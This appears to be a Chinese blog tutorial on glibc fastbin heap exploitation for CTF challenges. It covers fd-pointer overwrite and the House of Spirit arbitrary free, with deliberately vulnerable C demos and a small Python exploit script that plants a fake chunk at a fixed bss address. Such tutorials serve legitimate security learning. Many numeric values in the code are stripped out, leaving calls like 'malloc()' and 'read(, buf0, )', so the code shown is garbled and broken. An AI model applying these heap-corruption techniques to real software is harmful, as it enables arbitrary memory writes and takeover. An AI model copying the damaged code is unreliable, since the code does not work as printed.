Linux下fastbin利用小结——fd覆盖与任意地址free(House of Spirit)
linux下的fastbin是ctf中pwn题的重点出题点。去年(2015)中,XCTF就有两站是使用fastbin的利用作为pwn400的压轴题来出现,这也是我刚开始接触fastbin的利用,参考了k0sh1师傅写在freebuf上的一篇文章。我写了几个demo来说明问题。
目录
1.关于fastbin
2.覆盖fd指针实现利用
3.任意地址free实现利用(House of Spirit)
1.关于fastbin
我们一般熟悉的堆都是双链表的chunk,但是对于大小为(16 Bytes~ 64 Bytes)的堆块来说则是使用fastbin来进行管理的。
fastbin的堆块结构与常规的chunk是完全一样,除了使用的是单链表。
如上图就是一个正在使用中的fastbin块的结构
这是未被使用fastbin块。
通过这两幅图可以看出,原本是双链表(fd和bd)的位置现变成了单链表(fd)。
而fastbin就是依靠单链表来组织的,堆管理结构始终维护一个指向最后一个chunk的指针。这个指针决定了下一次要分配的chunk地址。
未被使用的chunk被链入单链表中,单链表的第一个chunk成员的fd值为NULL。
具体的链表情况如下:
其中最上面的是指向单链表最后chunk块的指针,chunk3因为是第一个chunk所以fd=0。
2.覆盖fd指针实现利用
当一个fastbin堆块存在堆溢出的时候,这种方法就可以使用了。简要的过程就是通过溢出覆盖一个在单链表中的chunk块的fd指针,当再次分配后(至少分配两次),就会在被覆盖的fd处分配fastbin chunk块,从而实现向任意地址分配堆块。
下面详细解释一下:
1.成功利用的条件
- 存在可被溢出的fastbin chunk块,要求可以使chunk块的fd能被控制
- 欲被分配的地址,要求此地址的内容可控(存在size域)
2.如何利用
- 分配两个fastbin chunk
- 使用第一个(位于低地址)覆盖第二个(位于高地址)的fd指针。注意,第一个应该是已被分配的,不然就没法写入导致溢出。第二个应该是未被分配的,不然就不存在fd也不存在分配的问题了。
- 在欲分配的地址,比如bss段上构造一个伪chunk结构,比如l32(0x0)+l32(41)+l32(0x0)(即前块正在使用中+本块大小为40+fd为0)
- 进行分配即可得到任意地址分配堆块的效果。从而可以实现任意地址写任意值的效果。
tips:指向的应为堆头的地址,而不是malloc返回的用户指针的位置
3.演示demo
int BufForTst[]; int main(int argc, char *argv[])
{
void *buf0,*buf1,*buf2,*buf3;
BufForTst[]=0x29;
buf0 = malloc();
buf1 = malloc();
printf("正常的chunk1、chunk2被分配\n");
free(buf1);
printf("chunk2被释放\n");
printf("break\n");//for debug
read(, buf0, );//overflow
buf2 = malloc();
buf3 = malloc();
printf("发生溢出的chunk2被分配\n%p\n溢出改写的fd地址被分配\n%p\n",buf2,buf3);
return ;
}
这个例程展示了如何通过覆盖fd指针实现向bss段分配堆块
from zio import *
io=zio('./tst',timeout=9999)
#io.gdb_hint()
io.read_until('break')
sc='a'*32+l32(0x0)+l32(0x29)+l32(0x804A060)
#sc='abcd'
io.writeline(sc)
io.read()
这个exp配合使用。命令如下
gcc tst.c -o tst
python exp.py
#define fastbin_index(sz) \
((((unsigned int) (sz)) >> (SIZE_SZ == ? : )) - )
...
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, ))
{
errstr = "malloc(): memory corruption (fast)";
注意,因为检查中没有进行对齐处理。所以可以利用错位来构造一个伪size结构以实现fasbin attack
3.任意地址free实现利用(House of Spirit)
当可以通过某种方式(比如栈溢出)控制free的参数时,就可以使用House of Spirit实现利用。大概的思路是free你要任意分配的地址,然后这个地址就会在再次分配的时候被分配到,但是要任意分配的地址要提起构造好伪chunk结构。
下面详细解释一下:
1.成功利用的条件
- free的参数可控,可以指向欲分配的地址。
- 欲分配的地址要求内容可控,可以提前构造伪chunk
2.如何利用
- 在欲分配的地址上构造伪chunk。由于堆的检验机制,要求构造连续的两个伪chunk。比如l32(0x0)+l32(41)+'aaaa'*8 +l32(0x0)+l32(41)
- 控制free的参数,指向chunk的地址
- 再次分配就可以在指定地点分配chunk了
tips:free的地址为malloc的地址,也就是堆头+8的地址。
3.演示demo
int TstBuf[];
int main(int argc, char *argv[])
{
void *p;
int i;
TstBuf[]=0x29;//为什么是0x29?因为32+8+FLAG位
TstBuf[]=0X29;//
p=malloc();
printf("正常的堆分配:%p\n",p);
p=(int *)0x804A068;
free(p);
printf("free了一个任意地址\n");
p=malloc();
printf("再次分配堆,可以看到分配到了任意地址上:%p\n",p);
}
成功的把堆块分配到了bss上,为了方便我硬编码了,可以根据自己的情况修改。
最新文章
- Sql Server系列:排序函数
- 点击 Run 之后发生了什么?
- ACM: Billboard 解题报告-线段树
- 从Unity引擎过度到Unreal4引擎(最终版)
- baidu 快递查询API
- jquery函数
- android 如何让文本中某个关键字高亮显示?
- Android IOS WebRTC 音视频开发总结(五三)-- 国内IM & RTC SDK列表
- 向Array中添加堆排序
- DAG模型——硬币问题
- java接口相关例题
- uva 469 - Wetlands of Florida
- Cannot mix incompatible Qt library (version 0x40801) with this library (version 0x40804)
- [UWP小白日记-9]页面跳转过度动画(二)
- 编译cvaux错误的原因
- JavaWeb学习 (十二)————使用Session防止表单重复提交
- 什么是Mixin模式:带实现的协议
- python之tkinter使用-滚动条
- [HDOJ]Coin Change(DP)
- java中<load-on-startup>含义
热门文章
- Qt ------ QWidget 自定义子类使用信号与槽(Q_OBJECT)后 stylesheet 失效
- Service Fabric Failover Manager
- js基础之DOM中元素对象的属性方法
- python的函数介绍 位置参数 关键字参数 默认参数 参数组 *args **kwargs
- element ui 上传文件,读取内容乱码解决
- 科学计算三维可视化---TVTK入门(数据加载)
- Django 2.0.1 官方文档翻译: 编写你的第一个 Django app,第二部分(Page 7)
- Python入门系列教程(二)字符串
- TreeSet按value排序
- Arcgis10.1 Arcobject连接Oracel数据库